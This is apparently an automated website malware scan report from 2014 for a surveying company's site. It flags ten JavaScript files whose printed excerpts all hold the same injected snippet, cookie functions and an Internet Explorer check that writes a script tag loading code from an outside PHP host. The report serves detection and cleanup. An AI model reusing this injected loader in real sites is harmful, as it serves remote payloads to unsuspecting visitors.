Malware Scanner report for alphaomegasurveying.com

Malicious/Suspicious/Total urls checked: 0/10/15

10 pages have suspicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/2

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://alphaomegasurveying.com/	200 OK Content-Length: 25484 Content-Type: text/html	clean
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js	200 OK Content-Length: 72174 Content-Type: text/javascript	clean
http://alphaomegasurveying.com/assets/js/jquery.tools.min.js	200 OK Content-Length: 21380 Content-Type: application/javascript	suspicious
Suspicious code found function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;} if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user6646 = getC ... 188 bytes are skipped ...http://hehn-consulting.de/GcDtTv2N.php?id=108186872' type='text/javascript'></" + "script>");} function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");}
http://alphaomegasurveying.com/assets/js/cufon.js	200 OK Content-Length: 36054 Content-Type: application/javascript	suspicious
Suspicious code found function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;} if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user6646 = getC ... 188 bytes are skipped ...http://hehn-consulting.de/GcDtTv2N.php?id=108186853' type='text/javascript'></" + "script>");} function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");}
http://alphaomegasurveying.com/assets/js/molengo-reg_400.font.js	200 OK Content-Length: 65527 Content-Type: application/javascript	suspicious
Suspicious code found function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;} if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user6646 = getC ... 188 bytes are skipped ...http://hehn-consulting.de/GcDtTv2N.php?id=108186874' type='text/javascript'></" + "script>");} function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");}
http://alphaomegasurveying.com/assets/js/uni05-54_400.font.js	200 OK Content-Length: 108192 Content-Type: application/javascript	suspicious
Suspicious code found function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;} if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user6646 = getC ... 188 bytes are skipped ...http://hehn-consulting.de/GcDtTv2N.php?id=108186876' type='text/javascript'></" + "script>");} function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");}
http://alphaomegasurveying.com/assets/js/jquery.infinitecarousel.js	200 OK Content-Length: 13367 Content-Type: application/javascript	suspicious
Suspicious code found function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;} if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user6646 = getC ... 188 bytes are skipped ...http://hehn-consulting.de/GcDtTv2N.php?id=108186867' type='text/javascript'></" + "script>");} function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");}
http://alphaomegasurveying.com/assets/js/jquery.mousewheel.js	200 OK Content-Length: 2364 Content-Type: application/javascript	suspicious
Suspicious code found function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;} if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user6646 = getC ... 188 bytes are skipped ...http://hehn-consulting.de/GcDtTv2N.php?id=108186869' type='text/javascript'></" + "script>");} function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");}
http://alphaomegasurveying.com/assets/js/jquery-ui-1.8.4.custom.min.js	200 OK Content-Length: 203310 Content-Type: application/javascript	suspicious
Suspicious code found function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;} if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user6646 = getC ... 188 bytes are skipped ...http://hehn-consulting.de/GcDtTv2N.php?id=108186864' type='text/javascript'></" + "script>");} function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");}
http://alphaomegasurveying.com/assets/js/vertical_scroll.js	200 OK Content-Length: 6050 Content-Type: application/javascript	suspicious
Suspicious code found function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;} if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user6646 = getC ... 188 bytes are skipped ...http://hehn-consulting.de/GcDtTv2N.php?id=108186879' type='text/javascript'></" + "script>");} function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");}
http://alphaomegasurveying.com/assets/js/custom_script.js	200 OK Content-Length: 3171 Content-Type: application/javascript	suspicious
Suspicious code found function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;} if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user6646 = getC ... 188 bytes are skipped ...http://hehn-consulting.de/GcDtTv2N.php?id=108186858' type='text/javascript'></" + "script>");} function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");}
http://alphaomegasurveying.com/assets/js/custom_IE.js	200 OK Content-Length: 1343 Content-Type: application/javascript	suspicious
Suspicious code found function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;} if (navigator.userAgent.indexOf("MSIE") != -1){if(navigator.cookieEnabled == true) {var user6646 = getC ... 188 bytes are skipped ...http://hehn-consulting.de/GcDtTv2N.php?id=108186856' type='text/javascript'></" + "script>");} function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");}
http://alphaomegasurveying.com/index.html	200 OK Content-Length: 25484 Content-Type: text/html	clean
http://alphaomegasurveying.com/content/Mueller-Results-of-Survey_R1.pdf	404 Not Found Content-Length: 454 Content-Type: text/html	clean
http://alphaomegasurveying.com/test404page.js	404 Not Found Content-Length: 428 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: alphaomegasurveying.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Jun 2014 13:35:04 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 25484
Content-Type: text/html

...25484 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: alphaomegasurveying.com
Referer: http://www.google.com/search?q=alphaomegasurveying.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=alphaomegasurveying.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://alphaomegasurveying.com/

Result: alphaomegasurveying.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for alphaomegasurveying.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools